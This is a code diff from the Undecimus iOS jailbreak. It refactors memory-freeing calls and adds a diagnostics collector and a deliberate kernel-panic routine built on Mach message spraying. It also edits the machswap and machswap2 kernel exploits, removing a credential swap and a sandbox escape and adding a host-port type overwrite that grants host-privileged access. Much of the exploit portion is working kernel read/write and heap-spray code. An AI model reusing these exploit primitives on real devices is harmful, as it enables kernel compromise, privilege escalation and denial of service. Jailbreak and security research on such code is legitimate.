+@property (weak, nonatomic) IBOutlet UIButton *enableGetTaskAllowInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *setCSDebuggedInfoButton;
+@property (weak, nonatomic) IBOutlet UIButton *autoRespringInfoButton;
+
+ (NSDictionary *)provisioningProfileAtPath:(NSString *)path;

@end

@@ -10,7 +10,7 @@
 #include <CoreFoundation/CoreFoundation.h>

 #include "KernelMemory.h"
-#include "KernelStructureOffsets.h"
+#include "KernelOffsets.h"
 #include "KernelUtilities.h"
 #include "async_wake.h"
 #include "early_kalloc.h"
@@ -175,7 +175,7 @@ mach_port_t* prepare_ports(int n_ports)
            for (int j = 0; j < i; j++) {
                mach_port_deallocate(mach_task_self(), ports[j]);
            }
-            free(ports);
+            SafeFreeNULL(ports);
            return NULL;
        }
    }
@@ -374,7 +374,7 @@ mach_port_t build_safe_fake_tfp0(uint64_t vm_map, uint64_t space)
    *(uint64_t*)(fake_kernel_task + koffset(KSTRUCT_OFFSET_TASK_VM_MAP)) = vm_map;
    *(uint8_t*)(fake_kernel_task + koffset(KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE)) = 0x22;
    kmemcpy(fake_kernel_task_kaddr, (uint64_t)fake_kernel_task, 0x1000);
-    free(fake_kernel_task);
+    SafeFreeNULL(fake_kernel_task);

    uint32_t fake_task_refs = ReadKernel32(fake_kernel_task_kaddr + koffset(KSTRUCT_OFFSET_TASK_REF_COUNT));
    LOG("read fake_task_refs: %x", fake_task_refs);
@@ -590,7 +590,7 @@ mach_port_t get_kernel_memory_rw()
    // now free first replacer and put a fake kernel task port there
    // we need to do this becase the first time around we don't know the address
    // of ipc_space_kernel which means we can't fake a port owned by the kernel
-    free(replacer_message_body);
+    SafeFreeNULL(replacer_message_body);
    replacer_message_body = build_message_payload(first_port_address, replacer_body_size, message_body_offset, kernel_vm_map, ipc_space_kernel(), &context_ptr);
    if (replacer_message_body == NULL) {
        return MACH_PORT_NULL;
@@ -0,0 +1,23 @@
+//
+//  diagnostics.h
+//  Undecimus
+//
+//  Created by Pwn20wnd on 5/3/19.
+//  Copyright © 2019 Pwn20wnd. All rights reserved.
+//
+
+#ifndef diagnostics_h
+#define diagnostics_h
+
+#include <Foundation/Foundation.h>
+
+#define STATUS_FILE @"/var/lib/dpkg/status"
+#define CYDIA_LIST @"/etc/apt/sources.list.d/cydia.list"
+
+NSArray *dependencyArrayFromString(NSString *depends);
+NSArray *parsedPackageArray(void);
+NSString *domainFromRepoObject(NSString *repoObject);
+NSArray *sourcesFromFile(NSString *theSourceFile);
+NSDictionary *getDiagnostics(void);
+
+#endif /* diagnostics_h */
@@ -0,0 +1,147 @@
+//
+//  diagnostics.c
+//  Undecimus
+//
+//  Created by Pwn20wnd on 5/3/19.
+//  Copyright © 2019 Pwn20wnd. All rights reserved.
+//
+
+#include "diagnostics.h"
+#include <common.h>
+#include <sys/utsname.h>
+#include <sys/sysctl.h>
+#include "utils.h"
+#include "prefs.h"
+
+#if 0
+Credits:
+- https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L1138
+- https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L1163
+- https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L854
+- https://github.com/lechium/nitoTV/blob/53cca06514e79279fa89639ad05b562f7d730079/Classes/packageManagement.m#L869
+#endif
+
+NSArray *dependencyArrayFromString(NSString *depends) {
+    NSMutableArray *cleanArray = [NSMutableArray new];
+    NSArray *dependsArray = [depends componentsSeparatedByString:@","];
+    for (NSString *depend in dependsArray) {
+        NSArray *spaceDelimitedArray = [depend componentsSeparatedByString:@" "];
+        NSString *isolatedDependency = [[spaceDelimitedArray objectAtIndex:0] stringByTrimmingCharactersInSet:[NSCharacterSet whitespaceAndNewlineCharacterSet]];
+        if ([isolatedDependency length] == 0) {
+            isolatedDependency = [[spaceDelimitedArray objectAtIndex:1] stringByTrimmingCharactersInSet:[NSCharacterSet whitespaceAndNewlineCharacterSet]];
+        }
+        [cleanArray addObject:isolatedDependency];
+    }
+    return cleanArray;
+}
+
+NSArray *parsedPackageArray() {
+    NSString *packageString = [NSString stringWithContentsOfFile:STATUS_FILE encoding:NSUTF8StringEncoding error:nil];
+    NSArray *lineArray = [packageString componentsSeparatedByString:@"\n\n"];
+    NSMutableArray *mutableList = [[NSMutableArray alloc] init];
+    for (NSString *currentItem in lineArray) {
+        NSArray *packageArray = [currentItem componentsSeparatedByString:@"\n"];
+        NSMutableDictionary *currentPackage = [[NSMutableDictionary alloc] init];
+        for (NSString *currentLine in packageArray) {
+            NSArray *itemArray = [currentLine componentsSeparatedByString:@": "];
+            if ([itemArray count] >= 2) {
+                NSString *key = [itemArray objectAtIndex:0];
+                NSString *object = [itemArray objectAtIndex:1];
+                if ([key isEqualToString:@"Depends"]) {
+                    NSArray *dependsObject = dependencyArrayFromString(object);
+                    [currentPackage setObject:dependsObject forKey:key];
+                } else {
+                    [currentPackage setObject:object forKey:key];
+                }
+            }
+        }
+        if ([[currentPackage allKeys] count] > 4) {
+            [mutableList addObject:currentPackage];
+        }
+        currentPackage = nil;
+    }
+    NSSortDescriptor *nameDescriptor = [[NSSortDescriptor alloc] initWithKey:@"Name" ascending:YES selector:@selector(localizedCaseInsensitiveCompare:)];
+    NSSortDescriptor *packageDescriptor = [[NSSortDescriptor alloc] initWithKey:@"Package" ascending:YES selector:@selector(localizedCaseInsensitiveCompare:)];
+    NSArray *descriptors = [NSArray arrayWithObjects:nameDescriptor, packageDescriptor, nil];
+    NSArray *sortedArray = [mutableList sortedArrayUsingDescriptors:descriptors];
+    mutableList = nil;
+    return sortedArray;
+}
+
+NSString *domainFromRepoObject(NSString *repoObject) {
+    if ([repoObject length] == 0) return nil;
+    NSArray *sourceObjectArray = [repoObject componentsSeparatedByString:@" "];
+    NSString *url = [sourceObjectArray objectAtIndex:1];
+    if ([url length] > 7) {
+        NSString *urlClean = [url substringFromIndex:7];
+        NSArray *secondArray = [urlClean componentsSeparatedByString:@"/"];
+        return [secondArray objectAtIndex:0];
+    }
+    return nil;
+}
+
+NSArray *sourcesFromFile(NSString *theSourceFile) {
+    NSMutableArray *finalArray = [NSMutableArray new];
+    NSString *sourceString = [[NSString stringWithContentsOfFile:theSourceFile encoding:NSASCIIStringEncoding error:nil] stringByTrimmingCharactersInSet:[NSCharacterSet whitespaceAndNewlineCharacterSet]];
+    NSArray *sourceFullArray =  [sourceString componentsSeparatedByString:@"\n"];
+    NSEnumerator *sourceEnum = [sourceFullArray objectEnumerator];
+    NSString *currentSource = nil;
+    while (currentSource = [sourceEnum nextObject]) {
+        NSString *theObject = domainFromRepoObject(currentSource);
+        if (theObject != nil) {
+            if (![finalArray containsObject:theObject])
+                [finalArray addObject:theObject];
+        }
+    }
+    return finalArray;
+}
+
+NSDictionary *getDiagnostics() {
+    NSMutableDictionary *diagnostics = [NSMutableDictionary new];
+    char *OSVersion = getOSVersion();
+    assert(OSVersion != NULL);
+    char *OSProductVersion = getOSProductVersion();
+    assert(OSProductVersion != NULL);
+    char *kernelVersion = getKernelVersion();
+    assert(kernelVersion != NULL);
+    char *machineName = getMachineName();
+    assert(machineName != NULL);
+    prefs_t *prefs = copy_prefs();
+    diagnostics[@"OSVersion"] = [NSString stringWithUTF8String:OSVersion];
+    diagnostics[@"OSProductVersion"] = [NSString stringWithUTF8String:OSProductVersion];
+    diagnostics[@"KernelVersion"] = [NSString stringWithUTF8String:kernelVersion];
+    diagnostics[@"MachineName"] = [NSString stringWithUTF8String:machineName];
+    diagnostics[@"Preferences"] = [NSMutableDictionary new];
+    diagnostics[@"Preferences"][@K_TWEAK_INJECTION] = [NSNumber numberWithBool:(BOOL)prefs->load_tweaks];
+    diagnostics[@"Preferences"][@K_LOAD_DAEMONS] = [NSNumber numberWithBool:(BOOL)prefs->load_daemons];
+    diagnostics[@"Preferences"][@K_DUMP_APTICKET] = [NSNumber numberWithBool:(BOOL)prefs->dump_apticket];
+    diagnostics[@"Preferences"][@K_REFRESH_ICON_CACHE] = [NSNumber numberWithBool:(BOOL)prefs->run_uicache];
+    diagnostics[@"Preferences"][@K_BOOT_NONCE] = [NSString stringWithUTF8String:(const char *)prefs->boot_nonce];
+    diagnostics[@"Preferences"][@K_DISABLE_AUTO_UPDATES] = [NSNumber numberWithBool:(BOOL)prefs->disable_auto_updates];
+    diagnostics[@"Preferences"][@K_DISABLE_APP_REVOKES] = [NSNumber numberWithBool:(BOOL)prefs->disable_app_revokes];
+    diagnostics[@"Preferences"][@K_OVERWRITE_BOOT_NONCE] = [NSNumber numberWithBool:(BOOL)prefs->overwrite_boot_nonce];
+    diagnostics[@"Preferences"][@K_EXPORT_KERNEL_TASK_PORT] = [NSNumber numberWithBool:(BOOL)prefs->export_kernel_task_port];
+    diagnostics[@"Preferences"][@K_RESTORE_ROOTFS] = [NSNumber numberWithBool:(BOOL)prefs->restore_rootfs];
+    diagnostics[@"Preferences"][@K_INCREASE_MEMORY_LIMIT] = [NSNumber numberWithBool:(BOOL)prefs->increase_memory_limit];
+    diagnostics[@"Preferences"][@K_ECID] = [NSString stringWithUTF8String:(const char *)prefs->ecid];
+    diagnostics[@"Preferences"][@K_INSTALL_CYDIA] = [NSNumber numberWithBool:(BOOL)prefs->install_cydia];
+    diagnostics[@"Preferences"][@K_INSTALL_OPENSSH] = [NSNumber numberWithBool:(BOOL)prefs->install_openssh];
+    diagnostics[@"Preferences"][@K_RELOAD_SYSTEM_DAEMONS] = [NSNumber numberWithBool:(BOOL)prefs->reload_system_daemons];
+    diagnostics[@"Preferences"][@K_RESET_CYDIA_CACHE] = [NSNumber numberWithBool:(BOOL)prefs->reset_cydia_cache];
+    diagnostics[@"Preferences"][@K_SSH_ONLY] = [NSNumber numberWithBool:(BOOL)prefs->ssh_only];
+    diagnostics[@"Preferences"][@K_ENABLE_GET_TASK_ALLOW] = [NSNumber numberWithBool:(BOOL)prefs->enable_get_task_allow];
+    diagnostics[@"Preferences"][@K_SET_CS_DEBUGGED] = [NSNumber numberWithBool:(BOOL)prefs->set_cs_debugged];
+    diagnostics[@"Preferences"][@K_HIDE_LOG_WINDOW] = [NSNumber numberWithBool:(BOOL)prefs->hide_log_window];
+    diagnostics[@"Preferences"][@K_EXPLOIT] = [NSNumber numberWithInt:(int)prefs->exploit];
+    diagnostics[@"AppVersion"] = [NSString stringWithString:appVersion()];
+    diagnostics[@"LogFile"] = [NSString stringWithContentsOfFile:getLogFile() encoding:NSUTF8StringEncoding error:nil];
+    diagnostics[@"Sources"] = [NSArray arrayWithArray:sourcesFromFile(CYDIA_LIST)];
+    diagnostics[@"Packages"] = [NSArray arrayWithArray:parsedPackageArray()];
+    diagnostics[@"Uptime"] = [NSNumber numberWithDouble:getUptime()];
+    SafeFreeNULL(OSVersion);
+    SafeFreeNULL(OSProductVersion);
+    SafeFreeNULL(kernelVersion);
+    SafeFreeNULL(machineName);
+    release_prefs(&prefs);
+    return diagnostics;
+}
@@ -13,7 +13,7 @@
 #include <stdlib.h>

 #include "KernelMemory.h"
-#include "KernelStructureOffsets.h"
+#include "KernelOffsets.h"
 #include "KernelUtilities.h"
 #include "find_port.h"
 #include <common.h>
@@ -12,7 +12,7 @@
 #include <mach/mach.h>

 #include "KernelMemory.h"
-#include "KernelStructureOffsets.h"
+#include "KernelOffsets.h"
 #include "KernelUtilities.h"
 #include "empty_list_sploit.h"
 #include <common.h>
@@ -271,8 +271,8 @@ static mach_port_t hold_kallocs(uint32_t kalloc_size, int allocs_per_message, in
            //return false;
        }
    }
-    free(ports_to_send);
-    free(msg);
+    SafeFreeNULL(ports_to_send);
+    SafeFreeNULL(msg);

    return port;
 }
@@ -394,7 +394,7 @@ static uint32_t early_rk32(uint64_t kaddr)
        LOG("pid_for_task returned %x (%s)", err, mach_error_string(err));
    }
    LOG("read val via pid_for_task: %08x", val);
-    free(buf);
+    SafeFreeNULL(buf);
    return val;
 }

@@ -810,8 +810,8 @@ bool vfs_sploit()
            break;
        }
    }
-    free(old_contents);
-    free(new_contents);
+    SafeFreeNULL(old_contents);
+    SafeFreeNULL(new_contents);
    if (pipe_target_kaddr_replacer_index == -1) {
        LOG("failed to find the pipe_target_kaddr_replacer pipe");
    }
@@ -5,7 +5,7 @@
 #include <mach/mach.h>

 #include "KernelMemory.h"
-#include "KernelStructureOffsets.h"
+#include "KernelOffsets.h"
 #include "KernelUtilities.h"
 #include "find_port.h"
 #include <common.h>
@@ -228,7 +228,7 @@ uint64_t find_port_via_proc_pidlistuptrs_bug(mach_port_t port, int disposition)

    //LOG("best guess is: 0x%016llx with %d%% of the valid guesses for it", best_guess, (best_guess_count*100)/valid_guesses);

-    free(guesses);
+    SafeFreeNULL(guesses);

    return best_guess;
 }
@@ -0,0 +1,16 @@
+//
+//  jailbreak.h
+//  Undecimus
+//
+//  Created by Pwn20wnd on 5/11/19.
+//  Copyright © 2019 Pwn20wnd. All rights reserved.
+//
+
+#ifndef jailbreak_h
+#define jailbreak_h
+
+#include <stdio.h>
+
+void jailbreak(void);
+
+#endif /* jailbreak_h */
@@ -0,0 +1,90 @@
+//
+//  panic.c
+//  Undecimus
+//
+//  Created by Pwn20wnd on 4/20/19.
+//  Copyright © 2019 Pwn20wnd. All rights reserved.
+//
+
+#include <stdlib.h>
+#include <mach/mach.h>
+#include <common.h>
+#include "kalloc_crash.h"
+
+struct simple_msg
+{
+    mach_msg_header_t hdr;
+    char buf[0];
+};
+
+/* credits to ian beer */
+static mach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t replacer_body_size)
+{
+    // allocate a port to send the messages to
+    mach_port_t q = MACH_PORT_NULL;
+    kern_return_t err;
+    err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q);
+    if (err != KERN_SUCCESS)
+    {
+        printf(" [-] failed to allocate port\n");
+        exit(EXIT_FAILURE);
+    }
+    
+    mach_port_limits_t limits = {0};
+    limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE;
+    err = mach_port_set_attributes(mach_task_self(),
+                                   q,
+                                   MACH_PORT_LIMITS_INFO,
+                                   (mach_port_info_t)&limits,
+                                   MACH_PORT_LIMITS_INFO_COUNT);
+    if (err != KERN_SUCCESS)
+    {
+        printf(" [-] failed to increase queue limit\n");
+        exit(EXIT_FAILURE);
+    }
+    
+    mach_msg_size_t msg_size = sizeof(struct simple_msg) + replacer_body_size;
+    struct simple_msg *msg = malloc(msg_size);
+    memset(msg, 0, sizeof(struct simple_msg));
+    memcpy(&msg->buf[0], replacer_message_body, replacer_body_size);
+    
+    for (int i = 0; i < 256; i++)
+    {
+        msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
+        msg->hdr.msgh_size = msg_size;
+        msg->hdr.msgh_remote_port = q;
+        msg->hdr.msgh_local_port = MACH_PORT_NULL;
+        msg->hdr.msgh_id = 0x41414142;
+        
+        err = mach_msg(&msg->hdr,
+                       MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
+                       msg_size,
+                       0,
+                       MACH_PORT_NULL,
+                       MACH_MSG_TIMEOUT_NONE,
+                       MACH_PORT_NULL);
+        
+        if (err != KERN_SUCCESS)
+        {
+            printf(" [-] failed to send message %x (%d): %s\n", err, i, mach_error_string(err));
+            exit(EXIT_FAILURE);
+        }
+    }
+    
+    return q;
+}
+
+static uint32_t message_size_for_kalloc_size(uint32_t size)
+{
+    return ((size * 3) / 4) - 0x74;
+}
+
+void do_kalloc_crash() {
+    for (;;) {
+        uint32_t body_size = message_size_for_kalloc_size(16384) - sizeof(mach_msg_header_t); // 1024
+        uint8_t *body = malloc(body_size);
+        memset(body, 0x41, body_size);
+        send_kalloc_message(body, body_size);
+        SafeFreeNULL(body);
+    }
+}
@@ -0,0 +1,16 @@
+//
+//  panic.h
+//  Undecimus
+//
+//  Created by Pwn20wnd on 4/20/19.
+//  Copyright © 2019 Pwn20wnd. All rights reserved.
+//
+
+#ifndef panic_h
+#define panic_h
+
+#include <stdio.h>
+
+void do_kalloc_crash(void);
+
+#endif /* panic_h */
@@ -66,22 +66,22 @@ static struct initialization offsets[] = {

 static void
 addresses__iphone11_2__16A366() {
-    ADDRESS(paciza_pointer__l2tp_domain_module_start)       = GETOFFSET(paciza_pointer__l2tp_domain_module_start);
-    ADDRESS(paciza_pointer__l2tp_domain_module_stop)        = GETOFFSET(paciza_pointer__l2tp_domain_module_stop);
-    ADDRESS(l2tp_domain_inited)                             = GETOFFSET(l2tp_domain_inited);
-    ADDRESS(sysctl__net_ppp_l2tp)                           = GETOFFSET(sysctl__net_ppp_l2tp);
-    ADDRESS(sysctl_unregister_oid)                          = GETOFFSET(sysctl_unregister_oid);
-    ADDRESS(mov_x0_x4__br_x5)                               = GETOFFSET(mov_x0_x4__br_x5);
-    ADDRESS(mov_x9_x0__br_x1)                               = GETOFFSET(mov_x9_x0__br_x1);
-    ADDRESS(mov_x10_x3__br_x6)                              = GETOFFSET(mov_x10_x3__br_x6);
-    ADDRESS(kernel_forge_pacia_gadget)                      = GETOFFSET(kernel_forge_pacia_gadget);
-    ADDRESS(kernel_forge_pacda_gadget)                      = GETOFFSET(kernel_forge_pacda_gadget);
+    ADDRESS(paciza_pointer__l2tp_domain_module_start)       = getoffset(paciza_pointer__l2tp_domain_module_start);
+    ADDRESS(paciza_pointer__l2tp_domain_module_stop)        = getoffset(paciza_pointer__l2tp_domain_module_stop);
+    ADDRESS(l2tp_domain_inited)                             = getoffset(l2tp_domain_inited);
+    ADDRESS(sysctl__net_ppp_l2tp)                           = getoffset(sysctl__net_ppp_l2tp);
+    ADDRESS(sysctl_unregister_oid)                          = getoffset(sysctl_unregister_oid);
+    ADDRESS(mov_x0_x4__br_x5)                               = getoffset(mov_x0_x4__br_x5);
+    ADDRESS(mov_x9_x0__br_x1)                               = getoffset(mov_x9_x0__br_x1);
+    ADDRESS(mov_x10_x3__br_x6)                              = getoffset(mov_x10_x3__br_x6);
+    ADDRESS(kernel_forge_pacia_gadget)                      = getoffset(kernel_forge_pacia_gadget);
+    ADDRESS(kernel_forge_pacda_gadget)                      = getoffset(kernel_forge_pacda_gadget);
    SIZE(kernel_forge_pacxa_gadget_buffer)                  = 0x110;
    OFFSET(kernel_forge_pacxa_gadget_buffer, first_access)  = 0xe8;
    OFFSET(kernel_forge_pacxa_gadget_buffer, pacia_result)  = 0xf0;
    OFFSET(kernel_forge_pacxa_gadget_buffer, pacda_result)  = 0xe8;
-    ADDRESS(IOUserClient__vtable)                           = GETOFFSET(IOUserClient__vtable);
-    ADDRESS(IORegistryEntry__getRegistryEntryID)            = GETOFFSET(IORegistryEntry__getRegistryEntryID);
+    ADDRESS(IOUserClient__vtable)                           = getoffset(IOUserClient__vtable);
+    ADDRESS(IORegistryEntry__getRegistryEntryID)            = getoffset(IORegistryEntry__getRegistryEntryID);
 }

 // A list of address initializations by platform.
@@ -14,6 +14,7 @@
 #include "log.h"
 #include "parameters.h"
 #include "platform.h"
+#include "common.h"

 // Compute the minimum of 2 values.
 #define min(a, b) ((a) < (b) ? (a) : (b))
@@ -108,9 +109,7 @@ ool_ports_spray_port(mach_port_t holding_port,
 		}
 	}
 	// Clean up the allocated ports.
-	if (alloc_ports != NULL) {
-		free(alloc_ports);
-	}
+    SafeFreeNULL(alloc_ports);
 	// Return the number of messages we sent.
 	return messages_sent;
 }
@@ -357,7 +356,7 @@ ool_ports_spray_size_with_gc(mach_port_t *holding_ports, size_t *holding_port_co
 	for (; ports_used < port_count && ools_left > 0; ports_used++) {
 		// Spray this port one message at a time until we've maxed out its queue.
 		size_t messages_sent = 0;
-		for (; messages_sent < (kCFCoreFoundationVersionNumber >= 1535.12 ? MACH_PORT_QLIMIT_MAX : MACH_PORT_QLIMIT_DEFAULT) && ools_left > 0; messages_sent++) {
+		for (; messages_sent < (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0 ? MACH_PORT_QLIMIT_MAX : MACH_PORT_QLIMIT_DEFAULT) && ools_left > 0; messages_sent++) {
 			// If we've crossed the GC sleep boundary, sleep for a bit and schedule the
 			// next one.
 			if (sprayed >= next_gc_step) {
@@ -422,7 +421,7 @@ port_drain_messages(mach_port_t port, void (^message_handler)(mach_msg_header_t
 			}
 			// The buffer was too small, increase it.
 			msg_size = msg->header.msgh_size + REQUESTED_TRAILER_SIZE(options);
-			free(msg);
+			SafeFreeNULL(msg);
 			msg = malloc(msg_size);
 			assert(msg != NULL);
 		}
@@ -439,7 +438,7 @@ port_drain_messages(mach_port_t port, void (^message_handler)(mach_msg_header_t
 		message_handler(&msg->header);
 	}
 	// Clean up resources.
-	free(msg);
+    SafeFreeNULL(msg);
 }

 void
@@ -165,7 +165,7 @@ size_t ool_ports_spray_size_with_gc(mach_port_t *holding_ports, size_t *holding_
 *
 * Description:
 * 	Create an array of Mach ports. The Mach ports are receive rights only. Once the array is no
- * 	longer needed, deallocate it with free().
+ * 	longer needed, deallocate it with SafeFreeNULL().
 */
 mach_port_t *create_ports(size_t count);

@@ -7,6 +7,7 @@
 #include <assert.h>
 #include <stdio.h>
 #include <stdlib.h>
+#import <common.h>

 void
 log_internal(char type, const char *format, ...) {
@@ -30,8 +31,8 @@ log_stderr(char type, const char *format, va_list ap) {
 		case 'W': type = '!'; break;
 		case 'E': type = '-'; break;
 	}
-	fprintf(stderr, "[%c] %s\n", type, message);
-	free(message);
+    RAWLOG("[%c] %s\n", type, message);
+	SafeFreeNULL(message);
 }

 void (*log_implementation)(char type, const char *format, va_list ap) = log_stderr;
@@ -625,6 +625,9 @@ extern uint64_t kernel_base;
 extern uint64_t kernel_slide;
 extern uint64_t ReadKernel64(uint64_t kaddr);
 extern void WriteKernel64(uint64_t kaddr, uint64_t val);
+extern uint32_t ReadKernel32(uint64_t kaddr);
+extern void WriteKernel32(uint64_t kaddr, uint32_t val);
+extern uint64_t cached_proc_struct_addr;

 // ********** ********** ********** ye olde pwnage ********** ********** **********

@@ -647,13 +650,11 @@ kern_return_t machswap2_exploit(machswap_offsets_t *offsets)
    int total_pipes = 0;
    
    host_t host = HOST_NULL;
-    host_t original_host = HOST_NULL;
    thread_t thread = THREAD_NULL;
    
    /********** ********** data hunting ********** **********/

    host = mach_host_self();
-    original_host = host;
    thread = mach_thread_self();
    vm_size_t pgsz = 0;
    ret = _host_page_size(host, &pgsz);
@@ -1240,6 +1241,14 @@ value = value | ((uint64_t)read64_tmp << 32);\
    uint64_t itk_space = 0x0;
    rk64(port_addr + offsetof(kport_t, ip_receiver), itk_space);
    LOG("itk_space: 0x%llx", itk_space);
+    
+    uint64_t is_table = 0x0;
+    rk64(itk_space + 0x20, is_table);
+    LOG("is_table: 0x%llx", is_table);
+    
+    uint64_t host_port_addr = 0x0;
+    rk64(is_table + (MACH_PORT_INDEX(host) * 0x18), host_port_addr);
+    LOG("host_port_addr: 0x%llx", host_port_addr);

    uint64_t ourtask = 0x0;
    rk64(itk_space + 0x28, ourtask); /* ipc_space->is_task */
@@ -1379,6 +1388,7 @@ value = value | ((uint64_t)read64_tmp << 32);\
        goto out;
    }
    LOG("got ourproc: 0x%llx", ourproc);
+    cached_proc_struct_addr = ourproc;
    
    /* find kernproc by looping linked list */

@@ -1514,46 +1524,14 @@ value = value | ((uint64_t)read64_tmp << 32);\
        allows the kernel task port to be accessed by any root process 
    */
    WriteKernel64(realhost + 0x10 + (sizeof(uint64_t) * 4), kernel_port_buf);
-
-    /* eleveate creds to kernel */
    
-    uint64_t orig_ucred = ReadKernel64(ourproc + offsets->struct_offsets.proc_ucred);
-    LOG("original ucred: 0x%llx", orig_ucred);
-
-    int orig_uid = getuid();
-
-    uint64_t kern_ucred = ReadKernel64(kernproc + offsets->struct_offsets.proc_ucred);
-    WriteKernel64(ourproc + offsets->struct_offsets.proc_ucred, kern_ucred);
+    uint32_t original_type = ReadKernel32(host_port_addr);
+    WriteKernel32(host_port_addr, IO_BITS_ACTIVE | IKOT_HOST_PRIV);
    
-    LOG("setuid: %d, uid: %d", setuid(0), getuid());
-    if (getuid() != 0)
-    {
-        LOG("failed to elevate to root/kernel creds!");
-        ret = KERN_FAILURE;
-        goto out;
-    }
-
-    host = mach_host_self();
    mach_port_t hsp4;
    ret = host_get_special_port(host, HOST_LOCAL_NODE, 4, &hsp4);
-    mach_port_deallocate(mach_host_self(), host);
-    host = original_host;
    
-    /* de-elevate */
-
-    WriteKernel64(ourproc + offsets->struct_offsets.proc_ucred, orig_ucred);
-    
-    LOG("setuid: %d, uid: %d", setuid(orig_uid), getuid());
-    if (getuid() != orig_uid)
-    {
-        LOG("failed to de-elelvate to uid: %d", orig_uid);
-        ret = KERN_FAILURE;
-        goto out;
-    }
-    
-    /* unsandbox */
-    uint64_t cr_label = ReadKernel64(orig_ucred + 0x78);
-    WriteKernel64(cr_label + 0x10, 0);
+    WriteKernel32(host_port_addr, original_type);

    if (ret != KERN_SUCCESS ||
        !MACH_PORT_VALID(hsp4))
@@ -1590,12 +1568,9 @@ out:;
    {
        mach_port_destroy(mach_task_self(), postport[i]);
    }
-
-    if (fakeport)
-    {
-        free((void *)fakeport);
-    }
-
+    
+    SafeFree((void *)fakeport);
+    
    if (the_one)
    {
        mach_port_destroy(mach_task_self(), the_one);
@@ -1611,14 +1586,11 @@ out:;
        mach_vm_deallocate(mach_task_self(), (mach_vm_address_t)pipebuf, pagesize);
    }
    
-    if (pipefds) {
-        free((void *)pipefds);
-    }
+    SafeFreeNULL(pipefds);
    
    if (MACH_PORT_VALID(host)) {
        mach_port_deallocate(mach_task_self(), host);
        host = HOST_NULL;
-        original_host = HOST_NULL;
    }
    
    if (MACH_PORT_VALID(thread)) {
@@ -341,6 +341,9 @@ extern uint64_t kernel_base;
 extern uint64_t kernel_slide;
 extern uint64_t ReadKernel64(uint64_t kaddr);
 extern void WriteKernel64(uint64_t kaddr, uint64_t val);
+extern uint32_t ReadKernel32(uint64_t kaddr);
+extern void WriteKernel32(uint64_t kaddr, uint32_t val);
+extern uint64_t cached_proc_struct_addr;

 // ********** ********** ********** ye olde pwnage ********** ********** **********

@@ -355,13 +358,11 @@ kern_return_t machswap_exploit(machswap_offsets_t *offsets)
    mach_port_t after[0x1000] = { };
    
    host_t host = HOST_NULL;
-    host_t original_host = HOST_NULL;
    thread_t thread = THREAD_NULL;

    /********** ********** data hunting ********** **********/

    host = mach_host_self();
-    original_host = host;
    thread = mach_thread_self();
    vm_size_t pgsz = 0;
    ret = _host_page_size(host, &pgsz);
@@ -686,6 +687,24 @@ value = value | ((uint64_t)read64_tmp << 32)
        goto out;
    }
    LOG("itk_space: 0x%llx", itk_space);
+    
+    uint64_t is_table = 0x0;
+    rk64(itk_space + 0x20, is_table);
+    if (is_table == 0x0) {
+        LOG("failed to find is_table!");
+        ret = KERN_FAILURE;
+        goto out;
+    }
+    LOG("is_table: 0x%llx", is_table);
+    
+    uint64_t host_port_addr = 0x0;
+    rk64(is_table + (MACH_PORT_INDEX(host) * 0x18), host_port_addr);
+    if (host_port_addr == 0x0) {
+        LOG("failed to find host_port_addr!");
+        ret = KERN_FAILURE;
+        goto out;
+    }
+    LOG("host_port_addr: 0x%llx", host_port_addr);

    uint64_t ourtask = 0x0;
    rk64(itk_space + 0x28, ourtask); /* ipc_space->is_task */
@@ -831,6 +850,7 @@ value = value | ((uint64_t)read64_tmp << 32)
    uint64_t ourproc = 0x0;
    rk64(ourtask + offsets->struct_offsets.task_bsd_info, ourproc);
    LOG("got ourproc: 0x%llx", ourproc);
+    cached_proc_struct_addr = ourproc;

    /* find kernproc by looping linked list */

@@ -955,61 +975,14 @@ value = value | ((uint64_t)read64_tmp << 32)
        allows the kernel task port to be accessed by any root process 
    */
    WriteKernel64(realhost + 0x10 + (sizeof(uint64_t) * 4), kernel_port_buf);
-
-    /* eleveate creds to kernel */
    
-    int orig_uid = getuid();
-
-    uint64_t orig_ucred = ReadKernel64(ourproc + offsets->struct_offsets.proc_ucred);
-    if (orig_ucred == 0x0)
-    {
-        LOG("failed to get orig_ucred!");
-        ret = KERN_FAILURE;
-        goto out;
-    }
-    LOG("orig_ucred: 0x%llx", orig_ucred);
-
-    uint64_t kern_ucred = ReadKernel64(kernproc + offsets->struct_offsets.proc_ucred);
-    if (kern_ucred == 0x0)
-    {
-        LOG("failed to get kern_ucred!");
-        ret = KERN_FAILURE;
-        goto out;
-    }
-    LOG("kern_ucred: 0x%llx", kern_ucred);
+    uint32_t original_type = ReadKernel32(host_port_addr);
+    WriteKernel32(host_port_addr, IO_BITS_ACTIVE | IKOT_HOST_PRIV);
    
-    WriteKernel64(ourproc + offsets->struct_offsets.proc_ucred, kern_ucred);
-    
-    LOG("setuid: %d, uid: %d", setuid(0), getuid());
-    if (getuid() != 0)
-    {
-        LOG("failed to elevate to root/kernel creds!");
-        ret = KERN_FAILURE;
-        goto out;
-    }
-    
-    
-    host = mach_host_self();
    mach_port_t hsp4;
    ret = host_get_special_port(host, HOST_LOCAL_NODE, 4, &hsp4);
-    mach_port_deallocate(mach_host_self(), host);
-    host = original_host;
    
-    /* de-elevate */
-
-    WriteKernel64(ourproc + offsets->struct_offsets.proc_ucred, orig_ucred);
-
-    LOG("setuid: %d, uid: %d", setuid(orig_uid), getuid());
-    if (getuid() != orig_uid)
-    {
-        LOG("failed to de-elevate to uid: %d", orig_uid);
-        ret = KERN_FAILURE;
-        goto out;
-    }
-    
-    /* unsandbox */
-    uint64_t cr_label = ReadKernel64(orig_ucred + 0x78);
-    WriteKernel64(cr_label + 0x10, 0);
+    WriteKernel32(host_port_addr, original_type);

    if (ret != KERN_SUCCESS ||
